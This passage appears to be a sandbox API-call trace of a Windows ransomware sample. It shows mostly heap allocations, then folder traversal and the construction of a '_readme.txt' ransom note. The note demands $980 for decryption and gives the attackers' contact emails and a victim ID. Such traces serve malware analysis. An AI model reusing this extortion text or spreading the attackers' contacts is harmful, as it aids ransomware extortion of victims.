[0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.923] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.923] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.924] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.924] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.925] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.926] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.928] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.928] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.928] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.928] PathFindFileNameW (pszPath="") returned="" [0165.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.929] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.929] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.929] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0165.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.929] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.929] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.930] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19ec8 [0165.930] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0165.930] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.930] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0165.930] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0165.930] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.930] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.930] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.930] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.930] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.930] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, 